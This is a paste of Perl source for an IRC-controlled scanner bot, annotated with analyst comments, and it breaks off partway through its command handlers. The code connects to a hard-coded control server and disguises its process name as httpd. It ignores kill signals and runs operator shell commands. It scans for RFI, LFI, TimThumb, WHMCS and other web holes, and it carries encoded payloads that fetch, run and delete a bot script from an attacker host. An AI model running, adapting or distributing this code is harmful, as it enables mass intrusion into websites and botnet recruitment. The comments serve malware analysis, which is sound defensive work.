sirnon

mltiscaner

Jul 24th, 2013
  1. #!/usr/bin/perl
  2.  
  3. use HTTP::Request;
  4. use HTTP::Request::Common;
  5. use HTTP::Request::Common qw(POST);
  6. use LWP::Simple;
  7. use LWP 5.64;
  8. use LWP::UserAgent;
  9. use Socket;
  10. use IO::Socket;
  11. use IO::Socket::INET;
  12. use IO::Select;
  13. use MIME::Base64;
  14. use URI::Escape;
  15. use Digest::MD5 qw(md5_hex);
  16. use DBI;
  17. use DBD::mysql;
  18.  
  # Analyst note: start-up configuration of an IRC-controlled scanner bot.
  # The server, port, channels, operator nick and staging host below are the
  # network indicators this page exposes; several can be overridden from
  # @ARGV or by chat commands handled further down.
  # Captured once at start-up; the TIME reply later sends this fixed value.
  19. my $datetime = localtime;
  # Assigned to $0 below so process listings show this name instead of perl.
  20. my $fakeproc = "/usr/sbin/httpd";
  # Default control server and port (replaced by $ARGV[0] / $ARGV[1] if given).
  21. my $ircserver = "scan.no-ip.org";
  22. my $ircport = 6667;
  # The nick gets a random 0-99 suffix, so it differs between instances.
  23. my $nickname = "ath0[".int(rand(100))."]";
  24. my $ident = "Sigit";
  # All four channel variables start out with the same value.
  25. my $channel = "#or";
  26. my $chanxxx = "#or";
  27. my $chaninfo = "#or";
  28. my $submitchan = "#or";
  # Operator nick: receives the sign-on message and the "change" notices.
  # isAdmin() is defined outside this excerpt; presumably it compares the
  # sender's nick with this value - confirm.
  29. my $admin = "ath0";
  30. my $fullname = "[!][scanner] Multi VersioN";
  # Extra launch arguments, used by the !raw / !say / !act handlers.
  31. my $rawmsg = $ARGV[4];
  32. my $msgraw = $ARGV[5];
  33.  
  # Message prefixes, one per scan family.
  34. my $nob0dy = " [!][scanner] Multi VersioN ";
  35. my $whmcslogo = " [!] WHMCS <=> ";
  36. my $thumblogo = " [!] TimThumb <=> ";
  37. my $zerologo = " [!] zBoarD <=> ";
  38. my $lfilogo = " [!] Lfi <=> ";
  39. my $rfilogo = " [!] Rfi <=> ";
  40. my $xmllogo = " [!] Xml <=> ";
  41. my $oscologo = " [!]Osco <=> ";
  42. my $oscosqllogo = " [!] O-Sql <=> ";
  43. my $e107logo = " [!] E107 <=> ";
  44. my $ihlogo = " [!] Is-Human <=> ";
  45. my $zenlogo = " [!] ZenCart <=> ";
  46. my $rfglogo = " [!] RfG <=> ";
  47. my $carilogo = " [!] Find <=> ";
  # Chat command strings the main loop matches on. $thumbcmd carries a random
  # digit 0-9, so that trigger varies per instance.
  48. my $whmcscmd = '.whmcs';
  49. my $thumbcmd = "!tim".int(rand(10));
  50. my $zerocmd = ".zero";
  51. my $lficmd = ".lfi";
  52. my $rficmd = ".rfi";
  53. my $xmlcmd = ".xml";
  54. my $e107cmd = ".e107";
  55. my $zencmd = ".zenc";
  56. my $ihcmd = ".ishu";
  57. my $oscocmd = ".osco";
  58. my $cmdlfi = ".cmdlfi";
  59. my $cmdxml = ".cmdxml";
  60. my $cmde107 = ".cmde107";
  61. my $rfgcmd = ".rfg";
  62. my $ftpcmd = ".ftp";
  # Flags and timeout. $gps / $gps2 gate engine groups in se_start();
  # $silentmode and $timot are changed by chat commands; the remaining flags
  # are not read anywhere in this excerpt.
  63. my $spreadMode = 1;
  64. my $zerowget = 1;
  65. my $zerolwp = 1;
  66. my $zerocurl = 1;
  67. my $gps = 1;
  68. my $gps2 = 1;
  69. my $timot = 10;
  70. my $silentmode = 1;
  # Staging host and the URLs derived from it. The derived values are computed
  # once here; the later !injector command replaces $hostinjector only.
  71. my $hostinjector = "flickr.com.lmao2.com";
  72. my $thumbid = "http://".$hostinjector."/bad.php";
  73. my $botdid = "http://".$hostinjector."/load.php";
  74. my $botxdid = "http://".$hostinjector."/xcrew.php";
  75. my $thumbshell = uri_escape($thumbid);
  # File names built from the MD5 of each staging URL; where they are used is
  # outside this excerpt.
  76. my $md5php = md5_hex($thumbid).".php";
  77. my $md5bot = md5_hex($botdid).".php";
  78. my $md5botx = md5_hex($botxdid).".php";
  79. my $botid = uri_escape($botdid);
  80. my $botxid = uri_escape($botxdid);
  81. my $injector = "http://".$hostinjector."/bad.txt";
  82. my $botshell = "http://".$hostinjector."/bot.txt";
  83. my $subticket = "/submitticket.php?step=2&deptid=1";
  84. my $action = "/data/lobex.php";
  # Pre-encoded query strings carrying a download-then-run shell sequence
  # (wget, lwp-download and curl variants, each ending in
  # "perl botis.txt;rm botis.txt"). Requests with "?cmd=" followed by these
  # tool names are worth searching for in web server access logs.
  85. my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20;perl%20botis.txt;rm%20botis.txt";
  86. my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20;perl%20botis.txt;rm%20botis.txt";
  87. my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20;perl%20botis.txt;rm%20botis.txt";
  # Fixed User-Agent string; presumably sent on the bot's HTTP requests (the
  # request helpers are outside this excerpt) - confirm.
  88. my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
  # Directory-traversal suffix ending in /proc/self/environ; the $cmdlfi
  # handler appends it to the URL it is given.
  89. my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
  90. my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  # All five $jackN values point at the same URL; the trailing comments show
  # the hosts an earlier revision combined with $jpath.
  91. my $jack1 = "http://tema1.simgta.com/lobex.php?q="; #"http://altadelisboa.com".$jpath;
  92. my $jack2 = "http://tema1.simgta.com/lobex.php?q="; #"http://selectiveretreats.com".$jpath;
  93. my $jack3 = "http://tema1.simgta.com/lobex.php?q="; #"http://agri-impact.com".$jpath;
  94. my $jack4 = "http://tema1.simgta.com/lobex.php?q="; #"http://viewwebinars.com".$jpath;
  95. my $jack5 = "http://tema1.simgta.com/lobex.php?q="; #"http://liftoffconsulting.ca".$jpath;
  # Comma-separated engine names that se_start() matches case-insensitively.
  # The literal spans three source lines, so the value contains newlines.
  96. my $engine = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
  97. JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
  98. JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
  99.  
  # INT, HUP and TERM are ignored, so those signals will not stop the process;
  # removing it takes SIGKILL, which cannot be ignored. CHLD is ignored too,
  # which on most Unix systems lets forked workers be reaped automatically.
  100. $SIG{'INT'} = 'IGNORE';
  101. $SIG{'HUP'} = 'IGNORE';
  102. $SIG{'TERM'} = 'IGNORE';
  103. $SIG{'CHLD'} = 'IGNORE';
  # NOTE(review): 'PS' does not look like a standard signal name - confirm.
  104. $SIG{'PS'} = 'IGNORE';
  105. #chdir("/");
  # Optional launch overrides: server, port, nick, channel (given without '#').
  106. $ircserver = "$ARGV[0]" if $ARGV[0];
  107. $ircport = "$ARGV[1]" if $ARGV[1];
  108. $nickname = "$ARGV[2]" if $ARGV[2];
  109. $channel = '#'."$ARGV[3]" if $ARGV[3];
  # Process-name masquerade: $0 becomes the fake name padded with NUL bytes.
  # Comparing the displayed name with the real interpreter path (for example
  # /proc/<pid>/exe on Linux) exposes the mismatch.
  110. $0 = "$fakeproc"."\0" x 16;
  # Detach: the parent exits at once and the child carries on in the
  # background; die is reached only when fork itself failed.
  111. my $pid = fork;
  112. exit if $pid;
  113. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  114.  
  # Global state: per-socket connection details and the select set used for
  # reads. The file has no `use strict`, so $sel_client and the variables
  # introduced later without `my` are package globals.
  115. our %irc_servers;
  116. our %DCC;
  # NOTE(review): mixes indirect-object and arrow syntax; $dcc_sel and %DCC
  # are not used anywhere in this excerpt.
  117. my $dcc_sel = new IO::Select->new();
  118. $sel_client = IO::Select->new();
  # sendraw(LINE) or sendraw(SOCKET, LINE): write one raw IRC line.
  # With two arguments the line goes to the given socket; otherwise it goes
  # to the global $IRC_cur_socket. Only "\n" is appended (no "\r").
  119. sub sendraw {
  # $#_ is the last index of @_, so 1 means exactly two arguments.
  120. if ($#_ == '1') {
  121. my $socket = $_[0];
  122. print $socket "$_[1]\n";
  123. } else {
  124. print $IRC_cur_socket "$_[0]\n";
  125. }
  126. }
  # connector(NICK, SERVER, PORT): open the TCP connection to the control
  # server, register the socket in the global select set and %irc_servers,
  # then send the NICK and USER registration lines.
  # Returns 1 when the connection cannot be opened. The main loop calls this
  # repeatedly while %irc_servers is empty, so an unreachable server shows up
  # as repeated outbound connection attempts to the configured host and port.
  127. sub connector {
  128. my $mynick = $_[0];
  129. my $ircserver_con = $_[1];
  130. my $ircport_con = $_[2];
  131. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  # Always true here: a failed connect has already returned above.
  132. if (defined($IRC_socket)) {
  133. $IRC_cur_socket = $IRC_socket;
  134. $IRC_socket->autoflush(1);
  135. $sel_client->add($IRC_socket);
  # Keyed by the stringified socket handle.
  136. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  137. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  138. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  139. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  # nick() is defined outside this excerpt.
  140. nick("$mynick");
  # The USER line carries the local socket address and the $fullname banner.
  141. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  142. sleep(1);}}
  143.  
  # parse(LINE): handle one server line for connection upkeep - keep-alive,
  # nick tracking, nick collisions and the post-registration sign-on sequence.
  # Reads and writes the globals $mynick, $IRC_cur_socket and %irc_servers.
  144. sub parse {
  145. my $servarg = shift;
  # Keep-alive: echo the server's PING token back.
  146. if ($servarg =~ /^PING \:(.*)/) {
  147. sendraw("PONG :$1");
  148. }
  # Track a nick change that applies to this bot.
  149. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  150. if (lc($1) eq lc($mynick)) {
  151. $mynick = $4;
  152. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  153. }
  154. }
  # Numeric 433 (nick already in use): retry with a random digit 0-4 appended.
  155. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  156. nick($mynick.int(rand(5)));
  157. }
  # Numeric 001 (registration accepted): record the nick and server name, then
  # run the sign-on sequence below.
  158. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  159. $mynick = $2;
  160. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  161. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  # NOTE(review): user-mode letters are server-specific; on some IRC daemons
  # +B marks a bot and +x cloaks the host - confirm for the server in use.
  162. sendraw("MODE $mynick +Bx");
  # Presumably a NickServ identify with a hard-coded password - confirm.
  163. sendraw("NS id qwe123");
  164. sleep(3);
  # The second word of each JOIN is the channel key.
  165. sendraw("JOIN $channel correct");
  166. sendraw("JOIN $chanxxx mejen");
  167. sleep(1);
  # Announces presence to the channel and to the operator nick.
  168. sendraw("PRIVMSG $channel : EhhEemmmm !!!");
  169. sendraw("PRIVMSG $admin :Hi $admin im here !!!");
  170. }
  171. }
  172.  
  # Main event loop: keep a connection to the control server, read whatever
  # arrives, react to chat commands, then feed complete lines to parse().
  # $line_temp holds an unfinished trailing line between reads.
  173. my $line_temp;
  174. while( 1 ) {
  # Reconnect until a server is registered; there is no back-off between
  # failed attempts other than the connect call itself.
  175. while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  # 10 ms pause per iteration.
  176. select(undef, undef, undef, 0.01);
  177. delete($irc_servers{''}) if (defined($irc_servers{''}));
  # Non-blocking poll of the registered sockets.
  178. my @ready = $sel_client->can_read(0);
  179. next unless(@ready);
  180. foreach $fh (@ready) {
  181. $IRC_cur_socket = $fh;
  182. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  183. $nread = sysread($fh, $ircmsg, 4096);
  # A zero-length read means the peer closed the connection: drop the socket
  # so the reconnect loop above runs again. There is no `next` here, so the
  # statements below still run on whatever $ircmsg holds.
  184. if ($nread == 0) {
  185. $sel_client->remove($fh);
  186.  
  187. $fh->close;
  188. delete($irc_servers{$fh});
  189. }
  190. @lines = split (/\n/, $ircmsg);
  191. $ircmsg =~ s/\r\n$//;
  # Command handling. The pattern is applied to the whole read buffer rather
  # than to each line. $path is the PRIVMSG target: the bot's own nick means a
  # private message (this branch); anything else is handled in the else branch.
  # isAdmin(), shell() and msg() are defined outside this excerpt.
  192. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  193. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  194. if ($path eq $mynick) {
  # CTCP-style replies. NOTE(review): the spaces around PING / VERSION / TIME
  # may be control-character delimiters lost when the code was pasted -
  # unverified.
  195. if ($msg =~ /^ PING (.*) /) {
  196. sendraw("NOTICE $nick : PING $1 ");
  197. }
  # The VERSION reply claims to be a desktop IRC client.
  198. if ($msg =~ /^ VERSION /) {
  199. sendraw("NOTICE $nick : VERSION mIRC v6.21 Khaled Mardam-Bey ");
  200. }
  201. if ($msg =~ /^ TIME /) {
  202. sendraw("NOTICE $nick : TIME ".$datetime." ");
  203. }
  # Operator-only housekeeping: terminate this process, kill every perl
  # process, quit, join / part a channel, change nick, report the PID.
  204. if (&isAdmin($nick) && $msg eq "!die") {
  205. &shell("$path","kill -9 $$");
  206. }
  207. if (&isAdmin($nick) && $msg eq "!killall") {
  208. &shell("$path","killall -9 perl");
  209. }
  210. if (&isAdmin($nick) && $msg eq "!reset") {
  211. sendraw("QUIT :Restarting...");
  212. }
  213. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  214. sendraw("JOIN #".$1);
  215. }
  216. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  217. sendraw("PART #".$1);
  218. }
  219. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  220. sendraw("NICK ".$1);
  221. }
  222. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  223. sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
  224. }
  # Any private message from the operator that does not start with '!' is
  # handed to shell(), which presumably runs it as a system command - confirm.
  # For incident response, assume arbitrary operator-supplied commands ran
  # under the account that owns this process.
  225. if (&isAdmin($nick) && $msg !~ /^!/) {
  226. &shell("$nick","$msg");
  227. }
  # Raw protocol passthrough using the targets given at launch ($ARGV[4..5]).
  228. if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
  229. sendraw("$rawmsg $msgraw ".$1);
  230. }
  231. if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
  232. sendraw("PRIVMSG $rawmsg ".$1);
  233. }
  234. if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
  235. sendraw("PRIVMSG $rawmsg : ACTION ".$1." ");
  236. }
  # Runtime reconfiguration of command strings, timeout and report channel.
  # Where the handler double-forks, the assignment happens in the grandchild,
  # so the parent's copy of the variable is unchanged.
  237. if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
  238. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  239. $newthumbcmd = $1;
  240. $thumbcmd = $newthumbcmd;
  241. &msg("$admin","$thumblogo Scan Command change to $thumbcmd ");
  242. }}}
  243. if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
  244. $newzerocmd = $1;
  245. $zerocmd = $newzerocmd;
  246. &msg("$admin","$zerologo Scan Command change to $zerocmd ");
  247. }
  248. if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
  249. $newwhmcscmd = $1;
  250. $whmcscmd = $newwhmcscmd;
  251. &msg("$admin","$whmcslogo Scan Command change to $whmcscmd ");
  252. }
  253. if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
  254. $newtimot = $1;
  255. $timot = $newtimot;
  256. &msg("$admin"," Get Content TimeOut change to $timot ");
  257. }
  258. if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
  259. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  260. $newchan = $1;
  261. $chanxxx = $newchan;
  262. &msg("$admin"," xChan change to $chanxxx ");
  263. }}}
  264. }
  # Channel-message branch: the same housekeeping commands as in private
  # messages, plus shell passthrough, mode toggles and the single-target
  # command helpers. isAdmin(), shell(), msg(), cmdlfi(), cmdxml() and
  # cmde107() are defined outside this excerpt.
  265. else {
  266. if (&isAdmin($nick) && $msg eq "!die") {
  267. &shell("$path","kill -9 $$");
  268. }
  269. if (&isAdmin($nick) && $msg eq "!killall") {
  270. &shell("$path","killall -9 perl");
  271. }
  272. if (&isAdmin($nick) && $msg eq "!reset") {
  273. sendraw("QUIT :Restarting...");
  274. }
  275. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  276. sendraw("JOIN #".$1);
  277. }
  278. if (&isAdmin($nick) && $msg eq "!part") {
  279. sendraw("PART $path");
  280. }
  281. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  282. sendraw("PART #".$1);
  283. }
  # Operator shell passthrough from the channel: ".sh <command>" or a message
  # addressed to the bot's nick. shell() presumably runs the text as a system
  # command - confirm; output routing is not visible here.
  284. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  285. &shell("$path","$1");
  286. }
  287. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  288. &shell("$path","$1");
  289. }
  # The three toggles below are not gated by isAdmin().
  290. if ($msg=~ /^!silent\s+(.*) -d/) {
  291. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  292. $smod = $1;
  293. if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
  294. elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
  295. &msg("$path"," [!]Silent Mode $silentstat !!!!");
  296. }}}
  # $gps and $gps2 switch the two engine groups in se_start() on or off.
  297. if ($msg=~ /^!jackx\s+(.*) -d/) {
  298. $engmod = $1;
  299. if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
  300.  
  301. elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
  302. &msg("$path","[!]Jack Engine $gpsstat !!!!");
  303. }
  304. if ($msg=~ /^!engine\s+(.*) -d/) {
  305. $engmod = $1;
  306. if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
  307. elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
  308. &msg("$path","[!]Multi Engine $gpsstat !!!!");
  309. }
  # Replaces the staging host name only; the URLs derived from it at start-up
  # ($thumbid, $botdid, ...) are not recomputed here.
  310. if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
  311. $newhostinjector= $1;
  312. $hostinjector = $newhostinjector;
  313. &msg("$path"," [ !]Injector change to $hostinjector ");
  314. }
  # Single-target helpers: each takes a URL and a command string from the
  # message and passes them to a helper defined elsewhere. These three
  # handlers are not gated by isAdmin(). The LFI variant appends the
  # /proc/self/environ traversal suffix to the URL.
  315. if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  316. my $url = $1.$lfdtest;
  317. my $cmd = $2;
  318. &cmdlfi($url,$cmd,$path);
  319. }
  320. if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  321. my $url = $1;
  322. my $cmd = $2;
  323. &cmdxml($url,$cmd,$path);
  324. }
  325. if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
  326. my $url = $1;
  327. my $cmd = $2;
  328. &cmde107($url,$cmd,$path);
  329. }
  330. ##################################################################### HELP COMMAND
  # !help lists the scan commands with their current trigger strings; it is
  # the bot's own summary of the scan families it supports.
  331. if ($msg=~ /^!help/) {
  332. my $helplogo = " [!]Help <=> ";sleep(3);
  333. &msg("$path","$helplogo Timthumb Vuln Scan: $thumbcmd [bug] [dork] ");
  334. &msg("$path","$helplogo RFG Vuln Scan: $rfgcmd [bug] [dork] ");
  335. &msg("$path","$helplogo RFI Vuln Scan: $rficmd [bug] [dork] ");
  336. &msg("$path","$helplogo LFI Vuln Scan: $lficmd [bug] [dork] ");
  337. &msg("$path","$helplogo XML Vuln Scan: $xmlcmd [bug] [dork] ");
  338. &msg("$path","$helplogo e107 Vuln Scan: $e107cmd [dork] ");
  339. &msg("$path","$helplogo WHMCS Vuln Scan: $whmcscmd [dork] ");
  340. &msg("$path","$helplogo ZeroBoard Vuln Scan: $zerocmd [dork] ");
  341. &msg("$path","$helplogo osCommerce Vuln Scan: $oscocmd [dork] ");
  342. &msg("$path","$helplogo ZenCart Vuln Scan: $zencmd [dork] ");
  343. }
  344. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  345. &msg("$nick"," 6Fake Process/PID : $fakeproc - $$");
  346. }
  # Health check of the staging URL: isFound() (defined outside this excerpt)
  # is asked whether $thumbid yields the marker "GIF89". The scan handlers
  # use the same check before starting work.
  347. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
  348. if (&isFound($thumbid,"GIF89")) {
  349. &msg("$path"," [!]Injector <=> Ready!!! ");
  350. } else {
  351. &msg("$path"," [!]Injector <=> Lost!!! ");
  352. }
  353. }
  # Health check of the five search relay URLs: each is fetched with the query
  # "byroe" and counted as up when the response contains "byroe.net".
  # get_content() is defined outside this excerpt.
  354. if ($msg=~/^!bypass/){
  355. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  356. my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
  357. my $cekby1 = &get_content($jack1."byroe");
  358. if ($cekby1 =~ /byroe\.net/i){ $bystats1 = " Up!!!"; } else { $bystats1 = " Lost!!!"; }
  359. my $cekby2 = &get_content($jack2."byroe");
  360. if ($cekby2 =~ /byroe\.net/i){ $bystats2 = " Up!!!"; } else { $bystats2 = " Lost!!!"; }
  361. my $cekby3 = &get_content($jack3."byroe");
  362. if ($cekby3 =~ /byroe\.net/i){ $bystats3 = " Up!!!"; } else { $bystats3 = " Lost!!!"; }
  363. my $cekby4 = &get_content($jack4."byroe");
  364. if ($cekby4 =~ /byroe\.net/i){ $bystats4 = " Up!!!"; } else { $bystats4 = " Lost!!!"; }
  365. my $cekby5 = &get_content($jack5."byroe");
  366. if ($cekby5 =~ /byroe\.net/i){ $bystats5 = " Up!!!"; } else { $bystats5 = " Lost!!!"; }
  367. &msg("$path","[!]Bypass <=> JacK1=$bystats1 JacK2=$bystats2 JacK3=$bystats3 JacK4=$bystats4 15JacK5=$bystats5 ")
  368. }}}
  369. ##################################################################### SCAN
  # Scan dispatch. Every handler below follows one pattern:
  #   1. double-fork, so the work runs in a detached grandchild;
  #   2. for most families, check via isFound() that the staging URL still
  #      serves the "GIF89" marker, and report "Injector <=> Lost" if not;
  #   3. report to $chanxxx who asked for the scan and in which channel (the
  #      report text is Indonesian: "Lapor <=> X lagi scan Y di Z" is roughly
  #      "Report: X is scanning Y in Z");
  #   4. call se_start() with a numeric type code that type() maps to the
  #      family's handler.
  # None of the scan triggers in this section is gated by isAdmin().
  # 'situs.txt' is passed as $simpan; presumably a results file name ("simpan"
  # is Indonesian for "save") - confirm in the handlers, which are outside
  # this excerpt. If so, that file in the working directory is a host artifact.
  370. if ($msg =~ /!cari\s+(.*)/) {
  371. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  372. my $find = $1;
  373. &msg($path,"$carilogo Searching $find ");
  374. &cari($path,$find);
  375. } exit; }
  376. }
  # Type 9: osCommerce.
  377. if ($msg =~ /^$oscocmd\s+(.*)/) {
  378. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  379. my $dork = $1;
  380. my $simpan = 'situs.txt';
  381. if (&isFound($thumbid,"GIF89")) {
  382. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Oscommerce di $path ");
  383. &msg("$path","$oscologo Dork <=> $dork ");
  384. &msg("$path","$oscologo Search Engine <=> Loading ");
  385. &se_start($path,"apalah",$simpan,$dork,$engine,9);
  386. } else {
  387. &msg("$path","[!]Injector <=> Lost!!! "); exit;
  388. }
  389. }
  390. }
  391. }
  # Type 3: local file inclusion.
  392. if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
  393. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  394. my ($bug,$dork) = ($1,$2);
  395. my $simpan = 'situs.txt';
  396. if (&isFound($thumbid,"GIF89")) {
  397. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan LFI di $path ");
  398. &msg("$path","$lfilogo Dork <=> $dork ");
  399. &msg("$path","$lfilogo Bugz <=> $bug ");
  400. &msg("$path","$lfilogo Search Engine <=> Loading ");
  401. &se_start($path,$bug,$simpan,$dork,$engine,3);
  402. } else {
  403. &msg("$path","[!]Injector <=> Lost!!! "); exit;
  404. }
  405. }
  406. }
  407. }
  # Type 5: remote file inclusion.
  408. if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
  409. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  410. my ($bug,$dork) = ($1,$2);
  411. my $simpan = 'situs.txt';
  412. if (&isFound($thumbid,"GIF89")) {
  413. &msg("$chanxxx"," [!] Lapor <=> $nick lagi scan RFI di $path ");
  414. &msg("$path","$rfilogo Dork <=> $dork ");
  415. &msg("$path","$rfilogo Bugz <=> $bug ");
  416. &msg("$path","$rfilogo Search Engine <=> Loading ");
  417. &se_start($path,$bug,$simpan,$dork,$engine,5);
  418. } else {
  419. &msg("$path","[!]Injector <=> Lost!!! "); exit;
  420. }
  421. }
  422. }
  423. }
  # Type 6: XML (no staging-host check in this handler).
  424. if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
  425. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  426. my ($bug,$dork) = ($1,$2);
  427. my $simpan = 'situs.txt';
  428. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan XML di $path ");
  429. &msg("$path","$xmllogo Dork <=> $dork ");
  430. &msg("$path","$xmllogo Bugz <=> $bug ");
  431. &msg("$path","$xmllogo Search Engine <=> Loading ");
  432. &se_start($path,$bug,$simpan,$dork,$engine,6);
  433. }
  434. }
  435. }
  # Type 1: TimThumb. A path argument starting with "/" is rejected with a
  # Portuguese message before anything else happens.
  436. if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
  437. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  438. my ($bug,$dork) = ($1,$2);
  439. my $simpan = 'situs.txt';
  440. if ($bug =~ m/^\//){ &msg("$path","[!]Burro tira a barra \/ do comeco :p "); exit; } else {
  441. if (&isFound($thumbid,"GIF89")) {
  442. &msg("$chanxxx","[!]Lapor <=> $nick lagi scan TimTHumb di $path ");
  443. &msg("$path","$thumblogo Dork <=> $dork ");
  444. &msg("$path","$thumblogo Bugz <=> $bug ");
  445. &msg("$path","$thumblogo Search Engine <=> Loading ");
  446. &se_start($path,$bug,$simpan,$dork,$engine,1);
  447. } else {
  448. &msg("$path","[!]Injector <=> Lost!!! "); exit; }
  449. }
  450. }
  451. }
  452. }
  # Type 2: WHMCS (fixed request path, no staging-host check).
  453. if ($msg =~ /^$whmcscmd\s+(.*)/) {
  454. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  455. my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
  456. my $simpan = 'situs.txt';
  457. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan WHMCS di $path ");
  458. &msg("$path","$whmcslogo Dork <=> $dork ");
  459. &msg("$path","$whmcslogo Search Engine <=> Loading ");
  460. &se_start($path,$bug,$simpan,$dork,$engine,2);
  461. }
  462. }
  463. }
  # Type 4: ZeroBoard.
  464. if ($msg =~ /^$zerocmd\s+(.*)/) {
  465. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  466. if (&isFound($thumbid,"GIF89")) {
  467. my ($bug,$dork) = ("zboard.php?id=byroe",$1);
  468. my $simpan = 'situs.txt';
  469. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan zboard di $path ");
  470. &msg("$path","$zerologo Dork <=> $dork ");
  471. &msg("$path","$zerologo Search Engine <=> Loading ");
  472. &se_start($path,$bug,$simpan,$dork,$engine,4);
  473. } else {
  474. &msg("$path","[!]Injector <=> Lost!!! ");
  475. }
  476. }
  477. }
  478. }
  # Type 7: e107.
  479. if ($msg =~ /^$e107cmd\s+(.*)/) {
  480. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
